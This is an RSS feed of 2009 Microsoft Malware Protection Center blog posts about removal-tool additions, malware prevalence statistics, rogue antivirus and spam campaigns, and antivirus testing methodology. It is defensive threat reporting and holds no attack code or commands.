<item><title>Delivering the latest MSRT update</title><description>Secuobs.com : 2009-09-09 08:26:16 - Microsoft Malware Protection Center - This month we added both the Win32/Bredolab and Win32/Daurso families to the latest MSRT release. Win32/Bredolab is a trojan downloader that garnered industry attention over the middle stages of 2009. This is due to a number of spam campaigns employing e-mail lures with parcel delivery themes. The e-mail messages appear to originate from legitimate sources such as UPS (United Parcel Service of America) or DHL (Dalsey, Hillblom and Lynn). However, Win32/Bredolab is not a new family of malware. Its origins date back at least three years, having gone through a number of evolutions during this time. Win32/Bredolab has been observed to download malware from a vast array of families. This includes families of trojan downloaders, rogues, worms, spam bots, password stealers and just about everything in between. From the beginning of 2009, the MMPC has observed variants of Win32/Bredolab downloading malware from over 100 unique families. To give you an idea, below is a short list of the more prevalent and well-known families downloaded, many of which are families addressed by MSRT: Win32/Alureon, Win32/Ambler, Win32/Boaxxe, Win32/Busky, Win32/Cbeplay, Win32/Cutwail, Win32/Danmec, Win32/Daurso, Win32/Emold, Win32/FakeRean, Win32/FakeSpypro, Win32/FakeXPA, Win32/Harnig, Win32/Haxdoor, Win32/Hiloti, Win32/Koobface, Win32/Momibot, Win32/Oderoor, Win32/Oficla, Win32/Otlard, Win32/Phdet, Win32/Rlsloup, Win32/Rugzip, Win32/Rustock, Win32/Sinowal, Win32/Srizbi, Win32/Tedroo, Win32/Ursnif, Win32/Vundo, Win32/Waledac, Win32/Wantvi, Win32/Winwebsec, Win32/Wopla, Win32/Zbot. The 2nd family added to the September release of MSRT is a password stealing trojan known as Win32/Daurso. It attempts to steal stored FTP credentials and could be referred to as a sibling of Win32/Bredolab due to some of the code shared by the installation wrapper. Additionally, the control server that Win32/Bredolab variants contact is exactly the same as that used by Win32/Daurso. Finally, Win32/Daurso is often downloaded by Win32/Bredolab itself. Win32/Daurso has the capability to retrieve passwords stored locally by popular 3rd party FTP clients such as CuteFTP, FlashFXP and Core FTP. Credentials residing in protected storage are also targeted by Win32/Daurso. It may come as no surprise to our readers, however, that we see that user credentials continue to be a valuable commodity for malware authors. The value of FTP credentials lies in the likelihood that the compromised account is associated with web hosting capability. This could easily be employed for nefarious purposes, either by inserting malicious content or for simple malware hosting purposes, for example. Scott Molenkamp</description><link>http://www.secuobs.com/revue/news/139051.shtml</link><guid isPermaLink="false">http://www.secuobs.com/revue/news/139051.shtml</guid></item>
<item><title>MSRT August Top Detection Reports</title><description>Secuobs.com : 2009-08-28 06:24:39 - Microsoft Malware Protection Center - This month the MMPC added a new threat family, Win32/FakeRean, to the MSRT. You can refer to Hamish's blog post, "Win32/FakeRean and MSRT", for more details on this fake, or rogue, security software. As of August 24, the MSRT had cleaned FakeRean from 162,328 infected machines. The following table shows data gathered from the MSRT since its August release.
Family | Threat Count | Machine Count
Taterf | 544,662 | 463,000
Renos | 308,789 | 228,973
Alureon | 249,101 | 211,441
FakeRean | 219,359 | 162,328
Bancos | 173,134 | 158,152
Koobface | 274,769 | 134,139
Frethog | 140,218 | 132,827
Cutwail | 166,284 | 110,840
Rustock | 98,673 | 90,788
Tibs | 93,175 | 84,081
Note the "Threat Count" total is higher than "Machine Count" because an infected machine may contain multiple components of a threat. Win32/Taterf noticeably still holds first place in the MSRT's top detections. This is a family of worms that spread via mapped drives in order to steal login and account details for popular online games. Taterf is closely related to Win32/Frethog, another MSRT family added at the same time as Taterf, and also found in the above list. We believe that the two are based on the same source code due to the similarities between them. Since they were first added, these two families have been ranked near the top, and this month is no exception. You can revisit a previous blog post about this threat for more in-depth details. Another usual suspect is Win32/Renos. It was added to the MSRT in May 2007, before rogue software was viewed as being as disruptive as it is today. Renos holds a high ranking due to its strong ties with rogues. We think this addition was a good investment, as many of us have at least once encountered the dreaded "Your computer is infected" message. A few notes about the remaining threats from the list:
- Win32/Koobface is a prevalent worm that spreads by utilizing social networking sites. It's a complex family with multiple components that act as proxies, report affected users' online behavior, generate "pay per click" advertising revenue, steal data, and even break captchas.
- Win32/Alureon is a family of data-stealing trojans. These trojans allow an attacker to intercept incoming and outgoing Internet traffic to gather confidential information such as user names, passwords, and credit card data. Win32/Alureon may also allow an attacker to transmit malicious data to the infected computer. This family also has rootkit components that provide stealth functionality.
- Win32/Bancos is a family of data-stealing trojans that captures users' online banking credentials such as account login names and passwords. These trojans send the captured information to the attacker by e-mail, or by uploading it to an attacker's FTP site or posting it to an attacker's Web site.
The following table shows the breakdown by country/region. US, China, and Brazil report the highest numbers of infected machines during the same time frame as the previous table.
Country/Region | Threat Count | Machine Count
US | 8,750,628 | 2,183,166
China | 1,085,140 | 383,378
Brazil | 737,322 | 282,152
UK | 1,078,540 | 278,207
Korea | 601,646 | 262,539
France | 412,115 | 156,566
Taiwan | 236,047 | 140,283
Spain | 328,829 | 133,264
Canada | 433,770 | 119,885
Mexico | 447,841 | 117,845
The US is at the top of this list as it is by default the top target for most of the malicious code out there. China and Brazil are actually a totally different story. While China is a top target for online game password stealers and the black market associated with them, Brazil is a prime goal for another breed of password stealers: those targeting bank accounts. Given these locations, it should come as no surprise that the top prevalent threats are what they are. As you look at this table you will see that the number of unique machines infected is lower than the total number of disinfections by MSRT. There are several reasons for this, including infections of multiple malware families on the same machine (some malware downloads other malware), multiple variants of the same family of malware found on the same machine, and re-infections of the same machine over time. MSRT is not a replacement for antivirus software with real-time protection from a known, trusted vendor. When choosing an AV vendor, be wary of rogue security software. You can find a list of anti-virus products for Windows here. We hope this data has been helpful for our readers. Marian Radu and Scott Wu, MMPC. Additional resources: Latest Microsoft Security Intelligence Report (SIR)</description><link>http://www.secuobs.com/revue/news/135437.shtml</link><guid isPermaLink="false">http://www.secuobs.com/revue/news/135437.shtml</guid></item>
<item><title>Winwebsec on YouTube</title><description>Secuobs.com : 2009-08-21 12:15:09 - Microsoft Malware Protection Center - In a previous blog, you may have read about rogues using a fake YouTube page to entice users into downloading and installing a rogue security trojan. We are now showing you the "real deal". We discovered a page (there are probably more) within the real YouTube.com website (fig. 1) trying to benefit from its user database by redirecting them, by means of social engineering (i.e. viewing an episode of a popular cartoon series), to another page (fig. 2). The malicious page pushes a fake video codec to install a copy of the trojan (Win32/Winwebsec). Figure 1: Malicious YouTube post. Figure 2: Fake video codec install request. Below, you can see a dialogue window that suggests that your computer is vulnerable, unstable and infected, and instructs you to buy the fake (rogue) security trojan to correct the "found" (yet non-existent) malware. The UI displays a "credible" interface with "controls" commonly found in security applications such as "System Scan", "Update" and "Settings". After a "scan", the rogue will commonly display a list of "discovered" malware as in the example shown below. Figure 3: Winwebsec fake detections. To complement the simulated scan, the rogue creates fake error messages as well to provide more convincing "evidence" that your computer is compromised, as in the examples shown below. Note the typo in the error message window title bar. Figures 4 and 5: Winwebsec generated error messages. Of course, after you realize you've been fooled by the rogue, you will want to uninstall it. When you attempt to remove Winwebsec, you'll discover that it doesn't allow you to easily accomplish this, and a "helpful FAQ" provides some insight that you can download another piece of software (fig. 6), which could represent another way for attackers to compromise your machine. Figure 6: "FAQ". This file is also detected by our products as Win32/Winwebsec. Be safe! Marian Radu, MMPC Dublin. PS: There is no security issue or vulnerability in YouTube.com. This is just a case of a user abusing a free service.</description><link>http://www.secuobs.com/revue/news/133094.shtml</link><guid isPermaLink="false">http://www.secuobs.com/revue/news/133094.shtml</guid></item>
<item><title>Password Stealers are Top Threats in China and Brazil</title><description>Secuobs.com : 2009-08-12 22:43:11 - Microsoft Malware Protection Center - On July 14, the MMPC added another fake security software program (rogue), Win32/FakeSpyPro, to the MSRT release. As of July 29, MSRT removal of FakeSpyPro has been reported from 187,258 machines worldwide. Rogues continue to be disruptive worldwide: three families (FakeSpyPro, InternetAntivirus and FakeXPA) from the worldwide top list are rogues.

Top detected families (password stealers were shown in italics in the original table):

Worldwide: Family - Threats - Machines Cleaned
Taterf - 460,015 - 392,821
Renos - 320,355 - 223,417
Koobface - 370,744 - 200,364
FakeSpypro - 187,258 - 185,229
Alureon - 166,563 - 148,945
Rbot - 150,103 - 143,565
InternetAntivirus - 137,171 - 134,050
Frethog - 137,819 - 127,570
FakeXPA - 100,170 - 95,965
Zlob - 90,981 - 84,752

China: Family - Threats - Machines Cleaned
Ceekat - 33,893 - 32,165
Frethog - 12,429 - 11,211
Lolyda - 16,464 - 10,955
Hupigon - 11,002 - 10,398
Parite - 15,991 - 8,296
RJump - 7,811 - 4,850
Rbot - 4,646 - 4,522
Corripio - 3,039 - 2,489
Zuten - 2,795 - 2,439
Brontok - 1,929 - 1,901

Brazil: Family - Threats - Machines Cleaned
Bancos - 73,930 - 61,646
Taterf - 25,569 - 23,522
Banker - 22,510 - 19,426
Banload - 20,609 - 16,923
Frethog - 14,721 - 13,591
Rbot - 11,527 - 11,067
Cutwail - 7,650 - 4,795
Zlob - 3,895 - 3,728
Virut - 5,322 - 3,689
Renos - 5,559 - 3,485

Data from emerging countries such as China and Brazil shows a different threat landscape, however. None of these rogues were seen in the top detected threats list in either China or Brazil. Additionally:
- Five of the top threat families in China are online game PWS: Ceekat, Frethog, Lolyda, Corripio and Zuten. Only one of them, Frethog, is in the top detected threats list worldwide. This can be explained by the fact that massively multiplayer online role-playing games (MMORPG) are extremely popular in China.
- Three of the top detected families in Brazil, Bancos, Banker and Banload, are online banking PWS, none of which are in the most detected threat list worldwide. It indicates that criminals continue to see value, and therefore reinvest, in targeting online banking sites in Brazil, more than four years after they created these PWS.
- Hupigon is very prevalent in China while not seen as much worldwide. It is a complicated threat that employs stealth backdoor behavior with keylogger and PWS payloads.
- Taterf and Frethog are the two MMORPG PWS that are prevalent in Brazil, and they are also prevalent worldwide. Games such as Rainbow Island, Cabal Online, Lineage, MapleStory, Legend of Mir, World of Warcraft, etc. targeted by these threats have a large fan base worldwide, apparently including Brazil.
Refer to this list to obtain and install a full AV product for your computer to get protected from these PWS threats. -- Scott Wu</description><link>http://www.secuobs.com/revue/news/130315.shtml</link><guid isPermaLink="false">http://www.secuobs.com/revue/news/130315.shtml</guid></item>
<item><title>Win32/FakeRean and MSRT</title><description>Secuobs.com : 2009-08-12 12:16:14 - Microsoft Malware Protection Center - This month we added another rogue to the MSRT family list: Win32/FakeRean. Win32/FakeRean is generally very similar to Win32/InternetAntivirus and Win32/FakeXPA, which we continue to see in large numbers each month. Following the fashion, Win32/FakeRean is distributed as several variants, each with a different name and a different "skin". Its interface is actually rendered from HTML stored inside the fake scanner's executable file. Because of this they can often look quite similar. Compare the interfaces for "Home Antivirus 2010" and "PC Antispyware 2010", for example. Win32/FakeRean scanner interface - "PC Antispyware 2010". Of course, this allows the creators of the malware to produce new variants with different names quite easily. Despite this, some elements of the interface are surprisingly static. The "Protection level", for example, is always displayed as "LOW". On the other hand, this isn't really surprising once you know that the program reports the same list of infections whether there is any malware on the system or not. While fabricated infection reports are not remarkable (indeed they are what defines this class of malware), the way in which Win32/FakeRean generates these reports is particularly unusual. It installs a copy of the ClamAV open source anti-virus scan engine along with a signature file specifically produced for the rogue. It then creates files with random names in various locations on local drives and uses the ClamAV engine and signatures to detect them. The files it creates and reports are harmless junk, not even executable. They appear to be filled with essentially random data, but are created in such a way that the rogue's signatures will detect them. So the rogue performs a real scan and detects real files that you would not expect to find on your computer, possibly making its claims more plausible. Win32/FakeRean is often downloaded by other malware, such as Win32/Renos, but it is also distributed through web sites that look fairly credible at first glance. Again, the different variants are often very similar, right down to the "testimanials" (sic). More information on rogues can be found in the latest Security Intelligence Report (SIR). -- Hamish O'Dea</description><link>http://www.secuobs.com/revue/news/130040.shtml</link><guid isPermaLink="false">http://www.secuobs.com/revue/news/130040.shtml</guid></item>
<item><title>Threats in China and Brazil - Password Stealers (PWS) are Top Dog</title><description>Secuobs.com : 2009-08-11 05:23:50 - Microsoft Malware Protection Center - On July 14, the MMPC added another fake security software program (rogue), Win32/FakeSpyPro, to the MSRT release. As of July 29, MSRT removal of FakeSpyPro has been reported from 187,258 machines worldwide. Rogues continue to be disruptive worldwide: three families (FakeSpyPro, InternetAntivirus and FakeXPA) from the worldwide top list are rogues.

Top detected families (PWS were shown in italics in the original table):

Worldwide: Family - Threats - Machines Cleaned
Taterf - 460,015 - 392,821
Renos - 320,355 - 223,417
Koobface - 370,744 - 200,364
FakeSpypro - 187,258 - 185,229
Alureon - 166,563 - 148,945
Rbot - 150,103 - 143,565
InternetAntivirus - 137,171 - 134,050
Frethog - 137,819 - 127,570
FakeXPA - 100,170 - 95,965
Zlob - 90,981 - 84,752

China: Family - Threats - Machines Cleaned
Ceekat - 33,893 - 32,165
Frethog - 12,429 - 11,211
Lolyda - 16,464 - 10,955
Hupigon - 11,002 - 10,398
Parite - 15,991 - 8,296
RJump - 7,811 - 4,850
Rbot - 4,646 - 4,522
Corripio - 3,039 - 2,489
Zuten - 2,795 - 2,439
Brontok - 1,929 - 1,901

Brazil: Family - Threats - Machines Cleaned
Bancos - 73,930 - 61,646
Taterf - 25,569 - 23,522
Banker - 22,510 - 19,426
Banload - 20,609 - 16,923
Frethog - 14,721 - 13,591
Rbot - 11,527 - 11,067
Cutwail - 7,650 - 4,795
Zlob - 3,895 - 3,728
Virut - 5,322 - 3,689
Renos - 5,559 - 3,485

Data from emerging countries such as China and Brazil shows a different threat landscape, however. None of these rogues were seen in the top list in either China or Brazil. More specifically:
- Five of the top threat families in China are online game PWS: Ceekat, Frethog, Lolyda, Corripio and Zuten. Only one of them, Frethog, is in the top list worldwide. This can be explained by the fact that massively multiplayer online role-playing games (MMORPG) are extremely popular in China.
- Three of the top threat families in Brazil, Bancos, Banker and Banload, are online banking PWS, none of which is in the top list worldwide. It indicates that the criminals continue to see value, and therefore reinvest, in targeting online banking sites in Brazil, more than four years after they created these PWS.
- Hupigon is very prevalent in China while not seen as much worldwide. It is a complicated threat that employs stealth backdoor behavior with keylogger and PWS payloads.
- Taterf and Frethog are the two MMORPG PWS that are prevalent in Brazil, and they are also prevalent worldwide. Games such as Rainbow Island, Cabal Online, Lineage, MapleStory, Legend of Mir, World of Warcraft, etc. targeted by these threats have a large fan base worldwide, apparently including Brazil.
Refer to this list to obtain and install a full AV product for your computer to get protected from these PWS threats. -- Scott Wu</description><link>http://www.secuobs.com/revue/news/129642.shtml</link><guid isPermaLink="false">http://www.secuobs.com/revue/news/129642.shtml</guid></item>
<item><title>We're Excited to Announce the Release of the MMPC Portal V2</title><description>Secuobs.com : 2009-07-22 03:55:28 - Microsoft Malware Protection Center - We've been working hard, have heard your feedback, and are excited to announce V2 of the MMPC Portal. This new portal contains several new features, including streamlined sample submission and tracking, which is made possible by creating an MMPC profile. When you log in, the information saved in your MMPC profile auto-populates the sample submission form, thereby expediting the submission process. You can then monitor the status of your submission online: if you are logged in (using your MMPC profile) while submitting a sample, we will allow you to view details for all samples you have submitted in the past. In effect we now have "one stop shopping" for sample submission and tracking. MMPC Portal V2 includes a change log which allows you to see new and updated detections in the most recent definition versions. We have also implemented RSS feeds for encyclopedia entries, active malware lists, and the change log to allow you to stay up to date. We have streamlined our UI to improve accessibility to content, extended existing content, and created new content. The new content includes a "guidance and advice" section, improved encyclopedia content organization, an expanded glossary, a list of recent research papers, updates on news and events, highlights around awards and certifications, as well as an introduction to our team. We're also looking forward to the new security blog aggregator page on the Microsoft web site that will be live tomorrow. This new page consolidates the latest blog posts from several teams, including the MMPC and our colleagues in the MSRC, and is a great way to keep up to date on the latest security news from Microsoft. We hope you enjoy the new portal as much as we do. -- Monilee Atkinson</description><link>http://www.secuobs.com/revue/news/123299.shtml</link><guid isPermaLink="false">http://www.secuobs.com/revue/news/123299.shtml</guid></item>
<item><title>Let telemetry be your guide, a proposal for security tests</title><description>Secuobs.com : 2009-07-17 11:21:47 - Microsoft Malware Protection Center - Users today are offered choices among many security products, any number of which are sufficient, and none perfect. Along with these products are myriads of product test results and certifications, all there to help you make a better, more informed decision on which product to use. And as product developers, we'll point to the tests and reviews that best represent our product, like this recent report on the just released Microsoft Security Essentials Beta and the most current AV-Comparatives test showing Windows Live OneCare (OneCare) reaching the vaunted status of Advanced+. But are the tests doing what they ought to do? I would like to take this opportunity to present a case for advancing the methodology of testing security products. In all the time that this industry has been in place, product testing has been conducted by way of throwing huge numbers of malware at the product and seeing how well the product can detect that malware. "Improvement" in testing was measured by increasing the number of samples. "Comprehensiveness" was to have millions instead of thousands, and coverage of the many types instead of just lots of malware. And only recently, consideration for false positives (FPs) is finally influencing the interpretation of the test results. An example: it is this concept of false positives that allowed OneCare to win the latest AV-Comparatives test. There were two other comparable products, one scoring a higher detection rate and one the same as OneCare. But, because they also were among the highest in FPs (over 15 FPs), both fell to Advanced. OneCare only had 0-2 false positives, the lowest of all tested products, and the only one in this lowest category. Because false positives cause unnecessary upheaval that may result in nonfunctioning machines, and because a high detection rate is often directly correlated with the propensity to FP, we would like to recognize AV-Comparatives, and all the other testers and certifications that do not blindly judge detection capability without consideration for false positives. And our hat's off to Virus Bulletin for having had a no-FP requirement for its VB100 Award for the longest time. So, the recognition that false positives are an important consideration in the interpretation of test results is now becoming standard. What next to make tests more meaningful for the real user? As I mentioned before, the standard way of testing is to throw lots and lots of malware at the products and present a detection percentage. This is then presented as a measure of the quality of the product. But does that really represent quality for the average user? The tests do not simulate the likely scenario on our machines at home or at the office. So, how is the result then meaningful? If a product misses 1% more than another, are those 10,000 samples in a million meaningful to you? Maybe it's 10,000 distinct samples of a single server-side polymorphic trojan from one site that your browser happens to warn you not to visit. Or, they might be mostly comprised of a set of targeted attacks: important to the targeted entity and the products they use, but for you or me? How do we fix this? One of the best advances in the security industry in recent years is the ability we have to capture telemetry about the malware cases we encounter. The data associated with malware infections enables us to produce the semiannual Security Intelligence Report. And selective use of prevalence reports enables us to make decisions each month regarding the best way for the MSRT to protect the ecosystem. Others in the industry make use of their telemetry to also produce reports, and free tools to clean up the most prevalent malware affecting the ecosystem. What we need to do is to incorporate this data in the tests. To accomplish this, the Microsoft Malware Protection Center (that's us), in its arrangements that give other security vendors access to the malware we collect, has started to also provide normalized prevalence data to other security vendors, security industry testers, and the WildList Organization. Tony Lee manages our collection of malware and its distribution to our partner security vendors who care to participate in the Microsoft Virus Information Alliance (VIA). He will contribute the next section of this blog.

"Malware manages to evolve in its ability to distribute, mutate and update itself at an increasingly fast pace; we're often talking about hours and days here. Malware also targets various sizes and groups of the population. These infection characteristics pose challenges to AV product testing, both in the demographic and chronological sense. In order to meaningfully reflect a product's ability to protect its users, the testing methodology employed needs to have an up-to-date and accurate view of the threat landscape. Through telemetry collected by our various antimalware products, we are able to observe what is statistically significant to reflect the state of threat activities in the wild, in near real time. For example, by observing the first seen and last seen dates of a threat, and its occurrences during various periods of time, we can assess the age, severity and activity trend at both file and threat levels. Recently, I established an experimental program to share this prevalence data with our security partners. We have received very positive feedback and suggestions. At the core of this program is an automation process that monitors noticeable new threat activities as they are taking place in the field. The process then aggregates, analyzes and publishes this data to security partners over an encrypted channel, on a daily basis. Recipients of this information can assimilate this data over time and construct a view similar to the example below:

SHA1: 18375FD78CDE1E1B7291FBC37831CB36013895FD
MD5: 9FFCA5614A1032B0709ECAB67DF10F49
Total Reports: 17,052
File Size: 96,047

We also share weekly information in a Top 100 list; the top 20 in the report generated July 10th are shown here. The ITW Index is an abstract representation of one element against another; it does not represent an actual count.

Rank - SHA1 - Threat Name - ITW Index
1 - 57fba4d10135c316676b9ad6c0c01c36dc63203a - Worm:Win32/Koobface.gen!D (generic) - 56
2 - 52c9b8405ba34081e64482cdc843bc4c86201e03 - VirTool:WinNT/Koobface.gen!B (generic) - 50
3 - 0a7499954d78214189824f8c5cda0b8267882921 - Worm:Win32/Koobface.gen!D (generic) (non_writable_container) - 43
4 - 8fc4a8c85c97b1094014fab96fc1135e79e6a41a - TrojanProxy:Win32/Koobface.gen!C (generic) (non_writable_container) - 38
5 - 7017d9cc703d195240679158e4f4bb229c25db5d - Trojan:Win32/Liften.A (non_writable_container) - 37
6 - 93afca82dc4e0e78a61740dd21cfa1e13ef638ab - TrojanDownloader:Win32/Small.gen!B (generic) (non_writable_container) - 36
7 - 51dd6f7bea5c1f8bcac756e34da0964af1193a36 - Trojan:Win32/Matcash.gen!M (generic) - 34
8 - 04cb20e91195126351fdd8ec472e663bfed5b452 - Backdoor:Win32/Delf.B (non_writable_container) - 33
9 - db9d18d257df0bb2ef894e3c25dbe42fb787ed34 - Trojan:Win32/Tibs.gen!lds (generic) - 25
10 - 85589f11ab008a9954acb9a80d97836d40c8d464 - Trojan:Win32/Vundo.gen!AN (generic) - 25
11 - e28580d1d635e7e4702b5975a00ceb61762d6a11 - TrojanDownloader:Win32/VB.XR - 23
12 - 3ed104ed15396c6a45d12621b577211700193179 - PWS:Win32/Daurso.gen!A (generic) (non_writable_container) - 23
13 - 245bfc230c2f93304dcd741000e4c53197b081cc - PWS:Win32/Daurso.gen!A (generic) (non_writable_container) - 22
14 - b2268207ea777d07620f983f96f51da34c7bb3bf - PWS:Win32/Daurso.gen!A (generic) (non_writable_container) - 22
15 - 2160b1794492f332ded96514785265ce4d21e8ef - Trojan:Win32/C2Lop.gen!B (generic) - 22
16 - 0890ff9aa1b4330561f53bb11a3fb00446515477 - Trojan:Win32/Killav.gen!A (generic) - 19
17 - 8579da5efc66348179bd9ea9985478887e2a5946 - Trojan:Win32/Ertfor.A - 17
18 - 948f6e13e36170a94f32edabb71c1e5b45324724 - VirTool:Win32/Injector.gen!G (generic) - 17
19 - a07938f44a443026ace653e8181518910fb3d103 - Trojan:Win32/Vundo.gen!AN (generic) - 17
20 - 3ce19165aeb97e92d4e55ba0fbe73c0aeea51d51 - VirTool:WinNT/Koobface.gen!B (generic) - 16

We hope that sharing this type of information can help security vendors prioritize resources to combat malicious threats in the wild. It is also our goal to encourage, by example, other security vendors to share data with AV product testers; the testers can then analyze and aggregate this data to better assess the relevance of threats and weigh them meaningfully in their tests. - Tony"

The examples above make a very good contrast to a password stealer that I encountered when someone passed me a spam message from within an MMORPG I was playing (SHA1: 3BC300E799D57601004692D3E1282637535257FA, MD5: A662DF230142E1E10DB4E8A2865E3AB7). I downloaded it and submitted it so our products would be able to protect against it. And to this day, there has been no outside telemetry of this piece of malware. But from a tester's perspective, my password stealer and each of the above examples shown by Tony are all the same, despite the fact that all of Tony's samples have been noticed on users' machines significantly more times. So, I would propose this method for a test strategy to get people to start thinking along these lines:
1. Test samples are gathered with accompanying telemetry.
2. Statistics are then normalized per contributor, so a larger company with more seats does not overwhelm another contributor's normalized telemetry.
3. After the application of a function to rate the significance of the individual test samples, samples are granted values.
4. Detection of a sample results in points corresponding to that sample's granted value.

Here is an example (prevalence):
Sample A: 50
Sample B: 25
Sample C: 15
Sample D: 5
Sample E: 2
Next 100 samples: 3

If a product misses only E, it would have a score of 98. If a product only detects A, B, C, D and E, it would score a 97. If a product only misses A and gets everything else, it would get a 50. I've simplified the example greatly. But you should be able to see basically that the product is being rated for its ability to detect what users are likely to encounter (and have encountered). The significance is that it is far more important to be protected against sample A because it is so much more prevalent, as it alone accounted for half of all infections. It will take some time, just as it took some time for most testers to fully recognize that detection scores cannot disregard the accompanying false positives. And even if the testers don't fully embrace this type of testing, we hope that we have opened their minds to consider a better representation of their test set, something that would be more meaningful to their constituents, the computer-using public. -- Jimmy Kuo and Tony Lee</description><link>http://www.secuobs.com/revue/news/121795.shtml</link><guid isPermaLink="false">http://www.secuobs.com/revue/news/121795.shtml</guid></item>
<item><title>The Newest Member of our Rogues Gallery</title><description>Secuobs.com : 2009-07-15 06:18:43 - Microsoft Malware Protection Center - The family added to the July MSRT release is Win32/FakeSpypro. As is often the case with rogues, they employ multiple "names" over time. The current branding used by Win32/FakeSpypro is "Antivirus System PRO", with the previous incarnation being "Spyware Protect 2009". The "user interface": Typically, Win32/FakeSpypro assaults the user with a barrage of system tray warnings, fake firewall messages and other pop-ups displaying fake warning messages. The ultimate goal, of course, is to part the end user from their money. On websites which look like the following, you may purchase a copy of Win32/FakeSpypro for the princely sum of $49.95 (US). Win32/FakeSpypro also drops and installs a browser helper object (BHO). This component is able to redirect queries to internet search engines such as live.com. The redirection is performed selectively, such as when a search term like "antivirus" is used. The user will then be presented with a fraudulent warning page in the browser, such as the one displayed below. Win32/FakeSpypro may arrive on a system via different paths. For example, it may be dropped by Win32/Preald, downloaded by Win32/Branvine or Win32/Bredolab, or even downloaded by prevalent spam bots such as Win32/Waledac and Win32/Cutwail. The MMPC has also observed Win32/FakeSpypro being installed via common exploit "kits" in the wild. -- Scott Molenkamp</description><link>http://www.secuobs.com/revue/news/120716.shtml</link><guid isPermaLink="false">http://www.secuobs.com/revue/news/120716.shtml</guid></item>
<item><title>Happy Birthday USA - The Waledac way</title><description>Secuobs.com : 2009-07-07 06:10:31 - Microsoft Malware Protection Center - Since Independence Day just passed, this probably looked appealing for the Waledac guys to drop us another campaign. The Waledac malware family is known for using special and recent events to try to increase their chances of infecting computers. We've blogged about past Waledac spam runs, such as during Valentine's and the US presidential elections last year. We've also seen Waledac take advantage of this event to send out another campaign. The "Independence" spammed e-mail looks like this: Please be advised that the actual subject/body of the e-mail may vary, as well as the links that you are redirected to. But the idea is the same: to get you to watch the "Independence fireworks". Other websites may include, but are not limited to, one of the following: movie4thjuly.com, video4thjuly.com, moviefireworks.com, 4thfirework.com, fireholiday.com, etc. Waledac usually uses quite a large list of new domains for each campaign, so the list is actually larger. Once you pay a visit to the "Independence" website, you'll be directed to a fake YouTube-lookalike webpage. Presumably here you are supposed to watch a video with amazing fireworks and some other "goodies". Actually, what happens here is that you'll be asked to run some executable instead, as you can see in the next picture, which is in this case "setup.exe". This is similar to the old trick with the fake codec, just a tad different. Please bear in mind that the actual filename might change to something enticing like "movie.exe", "fireworks.exe", etc. If you run this on a machine protected by Microsoft products (Microsoft Forefront, Windows Live OneCare, Microsoft Security Essentials), you'll get a pop-up saying that Trojan:Win32/Waledac.gen!A was detected and stopped. In the words of Capt. Steven Hiller (Will Smith) from Independence Day the movie: "Didn't I promise you fireworks?" We also advise you to stay away from any "fireworks" e-mails you may receive. -- Andrei Saygo and Patrik Vicol</description><link>http://www.secuobs.com/revue/news/117461.shtml</link><guid isPermaLink="false">http://www.secuobs.com/revue/news/117461.shtml</guid></item>
<item><title>An update from FIRST and what we can learn from the Nijō Castle</title><description>Secuobs.com : 2009-07-03 01:35:32 - Microsoft Malware Protection Center - Hi, Ziv Mador again. This week I'm attending the FIRST conference in Kyoto, Japan along with four of my Microsoft colleagues: Steve Adegbite, Andrew Cushman, Jonathan Ness and Dan Wolff. Today Jonathan, Steve and I gave a presentation about Microsoft's response to the attacks which exploited a 0-day vulnerability back in the fall of 2008. Microsoft released a security update, MS08-067, that fixed that vulnerability. Given the wormable nature of that vulnerability, we had strongly encouraged customers to install the security update, for example in the following blog post. In the days, weeks and months following the bulletin release, malware exploiting MS08-067 has been launched, including the widely known Conficker worm. In our presentation we described the evolution of those exploits and the steps that Microsoft has taken to mitigate the threats. FIRST is a worldwide organization of response teams and the annual FIRST conference is an international event. Nearly 400 researchers from 52 countries are attending the event this year. It is a great example of collaboration and information sharing in the security industry. Microsoft is a member and returning sponsor of FIRST. We participate in FIRST in order to share our experience and best practices and to encourage collaboration and community based defense to meet current and future challenges. Microsoft participates also in other forums. For example, it participates in the Conficker Working Group, which helps mitigate the Conficker worm. Kyoto includes many different historical sites, as it used to be the Imperial capital of Japan for about a thousand years. One of these sites is the Nijō Castle. The architects of this castle designed and created several defense systems. There are two rings of fortifications; each one of them uses a wall and a wide moat. That obviously made an attack on the castle more difficult. But another interesting security feature was used there: the floors in the corridors were built in a way that they chirp like birds when people step on them. That's why they are called uguisubari or nightingale floors. This feature helped the defenders of the castle immediately know when someone entered the castle, possibly with a malicious intent. It is probably one of the earliest security warning systems ever developed. This castle, or the Red Fort in Agra which David described in an earlier blog post, represent some of the basic ideas in defense systems that also apply to modern computer networks: in order to secure them there is a need for an effective warning system, multiple security defense layers, and plans for response and recovery. Conficker can be used as a good example here. The later variants of this worm spread using multiple vectors: they exploit MS08-067 to infect other computers on the network, but also spread through shares with weak passwords and through removable media and auto-run. That means that even if an organization fully deploys all the security updates as soon as they are released, they still haven't mitigated the risk of infections. To minimize that risk, the organization must also ensure that shares use strong passwords, disable auto-run or educate users to select only the legitimate options, use an up to date AV, enterprise firewall, IPS systems, etc. That said, modern computer networks should be protected the same way as the Nijō castle: a multi-layered defense approach. Keep safe, Ziv Mador</description><link>http://www.secuobs.com/revue/news/116510.shtml</link><guid isPermaLink="false">http://www.secuobs.com/revue/news/116510.shtml</guid></item>
<item><title>Online Game Password Stealers Riding with 0-day DirectShow Exploits</title><description>Secuobs.com : 2009-06-26 05:55:03 - Microsoft Malware Protection Center - On May 28, our colleagues at the Microsoft Security Response Center released advisory 971778, which elaborated on a new vulnerability in Microsoft DirectShow affecting Windows 2000, Windows XP and Windows Server 2003. You can obtain more details on how to protect your environment from this vulnerability from the Microsoft SRD blog. We have been closely monitoring the malware landscape for threats related to leveraging exploits against this new vulnerability. We subsequently developed and released a generic detection for malformed media files, Exploit:Win32/CVE-2009-1537, based on MAPP information provided to us. Also, we have developed detections for the known malicious web pages, as Exploit:JS/Mult.BM or Trojan:HTML/Redirector.I. Our security products, such as Windows Live OneCare, Microsoft Security Essentials, and Forefront Client Security, can block access to these malformed media files with signature definition update version 1.59.798 or higher. While we are aware of several distinct files containing these exploits, based on our telemetry, the number of affected customers is very low. For our fellow researchers in other security companies, here are some SHA1 and MD5 hashes of malformed media files:

SHA1 - MD5
2203a2e9a22f8eedb14afbf12af7ce9e70b1abd9 - 7334880a6ca750db02530fb66ba426ad
9b9e829eeb5215a6d6970a37d42672f5e1504846 - 40f56aacb823a28c2b70287692c4a338
bcd76e2c4c174b8bf5866cc0dbd2233db809b05d - 599c92d7ee4f404ebe1ccf2034bee60f

